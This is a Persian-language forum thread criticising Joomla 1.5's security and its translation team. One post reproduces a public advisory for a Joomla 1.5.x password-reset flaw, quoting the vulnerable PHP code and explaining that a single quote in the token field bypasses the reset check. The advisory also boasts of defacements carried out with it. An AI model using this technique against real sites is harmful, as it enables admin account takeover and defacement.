تیم جوملا توی کد نویسی بازم سوتی داد ;D کلی سایت با این سوتی هک شدند :-X
جوملا توی این ماه 3 نسخه داد بیرون :D توی هر نسخه هم فقط باگ رفع کرد .
:'( :'( :'(
آقا مامبو عشقه
نمایش نسخه قابل چاپ
تیم جوملا توی کد نویسی بازم سوتی داد ;D کلی سایت با این سوتی هک شدند :-X
جوملا توی این ماه 3 نسخه داد بیرون :D توی هر نسخه هم فقط باگ رفع کرد .
:'( :'( :'(
آقا مامبو عشقه
دقیقا حق باشما
core مامبو واقعا از نظر امنیتی stable تر هست جوملا در این پچ جدید برای 1.5 یعنی پچ 6 خیلی واقعا گل کاشته !
جالب اینجا که با این باگ حتی بچه ها هم می تونن سایت های جوملا 1.5 رو هک کنن
البته منکر خوبی های جوملا نمیشیم امامامبو هنوز در این جور موارد حرف اول رو میزنه !
یاعلی
نسخه 1.5 به جز باگ های امنیتی ، در خیلی از قسمت ها هم به درستی کار نمی کنه.
خصوصا در قسمت legacy  و  مشکلات دیگه ای که داشت که من به شخصه حتی به چشم یک برنامه beta هم بهش نگاه نمی کنم.
از نسخه قبل جوملا یعنی 1.0.15  خیلی نازل تر و بی برنامه تر عمل کرده.  هنوز برای تست و رفع عیب و  compability  جای کار داشت.
**سعید جان تصحیح کردم
مامبو از نظر هسته واقعا فوق العاده است.
البته نباید این نکته را فراموش کرد که این نسخه از جوملا بازنویسی شده و مسلما مشکلاتی رخ خواهد داد که دور از انتظار نیست
نسخه 1.5 زمان زیادی نیاز داره تا هسته اش مثل مامبو بی مشکل بشه و باید توجه کرد که ولوپرهای جوملا ، زمانی دولوپر مامبو بودن
آره جوملا مشکل زیاد داره نه فقط خود جوملا بلکه سایت خود جومفا هم نقص زیاد داره
جوملا 1 خیلی بهتر عمل می کرد
جوملا چه ربطی به جومفا داره
بله دوستان قضيه اين سوتي از اين قراره!!! ;D
################################################## ###################################
####                    Joomla 1.5.x Remote Admin Password Change              ####
################################################## ###################################
#                                                                                  #
# Author: d3m0n (d3m0n@o2.pl)                                                      #
# Greets: GregStar, gorion, d3d!k                                                  #
#                                                                                  #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
#                                                                                  #
################################################## ###################################
File : /components/com_user/controller.php
################################################## ###################################
Line : 379-399
function confirmreset()
{
// Check for request forgeries
JRequest::checkToken() or die( 'Invalid Token' );
// Get the input
$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1}
                 
// Get the model
$model = &$this->getModel('Reset');
// Verify the token
if ($model->confirmReset($token) === false)  < --- {2}
{
$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_F AILED', $model->getError());
$this->setRedirect('index.php?option=com_user&am p;view=reset&layout=confirm', $message);
return false;
}
$this->setRedirect('index.php?option=com_user&am p;view=reset&layout=complete');
}
################################################## ###################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token)
{
global $mainframe;
$db = &JFactory::getDBO();
$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3}
// Verify the token
if (!($id = $db->loadResult()))
{
$this->setError(JText::_('INVALID_TOKEN' ));
return false;
}
// Push the token and user id into the session
$mainframe->setUserState($this->_namespace.'token', $token);
$mainframe->setUserState($this->_namespace.'id', $id);
return true;
}
################################################## ###################################
{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
******************************
***** باید جلو سوء استفاده رو گرفت ;) ممکنه خیلی ها دست بکار بشن و سایت ها رو ... ;)
[quote author=نوید link=topic=15750.msg82926#msg82926 date=1218876303]
جوملا چه ربطی به جومفا داره
[/quote]
چرا ربط نداره خوب خود اونها (جومفا)هم فقط ترجمه می کنند وهیچ توجی به باگ ها ندارند
مثل همین قضیه 4.6.5 که حتی چند تا باگ خود مامبو گزارش کرد
لول ، تیم جومفا که دیگه خیلی باحاله!!
مشکل کار رو بهشون می گی ، راه حل رو هم می دی ، بازم معلوم نیست چرا درست کار نمی کنند!!
برای این که یک مسئله رو حل کنید ، نصفش اینه که اول مسئله رو بفهمید.
من توی اون سایت ثبت نام کردم، بعد اکانت من بدون هیچ دلیلی بلاک شد!
با مدیران که تماس گرفتم ، 8 - 9 ساعتی و 8 - 9 پسام صرف کردم تا اصلا حاضر بشن بهم جوا ب بدن.
بعد هنم که در انجمن عضو شدم که مشکلم رو اونجا بیان کنم ، برای بار 12 به بعد می گفتند که شما با اسم کاربری فارسی توی انجمن ثبت نام کردید، اما من نمی دونستم چطور باید منظورم رو بفهمونم که من اکانتم توی سایت بلاک شده . نه توی انجمن!
با گذاشتن آدرس سایت ، بردن اسم جوملا ، سیستم مدیریت محتوای جومفا، صفحه اصلی خود سایت ، انجمن رو نمی گم بابا ، نام کاربری من انگلیسی هست و .... تا دفعه 15 - 16 به نتیجه نرسیدم و کلا بی خیال ماجرا شدم.
چیزی که منو ناراحت کرد ، این بود که خوب مشخصه که بعد از 15 بار که بگم مشکل من در سایت هست ، باید متوجه بشن. اما متاسفانه احتمالا به خاطر هر دلیلی! به جای اینکه مشکلشون رو رفع کنن، یا منو سر می دووندند یا کمی هم با بی لطفی و با چاشنی استهزا متاسفانه برخورد کردند.
خوب. هر تیمی که از پس رفع عیب مشکل بلاک شدن یوزرهاش یا .. بر نیاد ، یا هم اگر مشکل نبوده و دستی من رو بلاک کردند، باید علاوه بر سوتی های خود جوملا ، شیرین کاری هایی رو نیز پیوستش کنه.
این رو یادم رفت بگم که برای آخرین بار جوابی که به من داده شد این بود که با مدیر انجمن تماس بگیرید!!!!!!!
نمی دونستم که SMF علاوه بر مدیر انجمن که خودش داره، مدیران اصلی رو به صورت hidden داره !
ولی به هر حال ، نمی شه منکر زحماتشون شد.
ولی کار خوب که زورکی نمی شه. به قول معروف " عشق به زور، مهر به چماق؟ "
** خواهش می کنم دو پست منو یکی کنید، اون بالا هم پسام ، پیام هست درستش
سلام
لطفا بحث رو به تیم های دیگه نکشونید . اونها هم زحمت میکشن و وقت میذارن . اینکه جوملا این مشکل رو داشته چیزی از زحمات تیم جومفا کم نمیکنه .
در برنامه نویسی خیلی از مواقع پیش میاد که باگی از زیر دست برنامه نویس در بره ... هر چند این باگ خیلی ........ بود ولی باز هم چیزی از بزرگی جوملا یا زحمات تیم جومفا کم نمیکنه
لطفا این گونه مباحث رو در این انجمن نکنید . اگر انتقاد یا پیشنهادی دارید میتونید مستقیما در انجمن جومفا مطرح کنید .
یا علی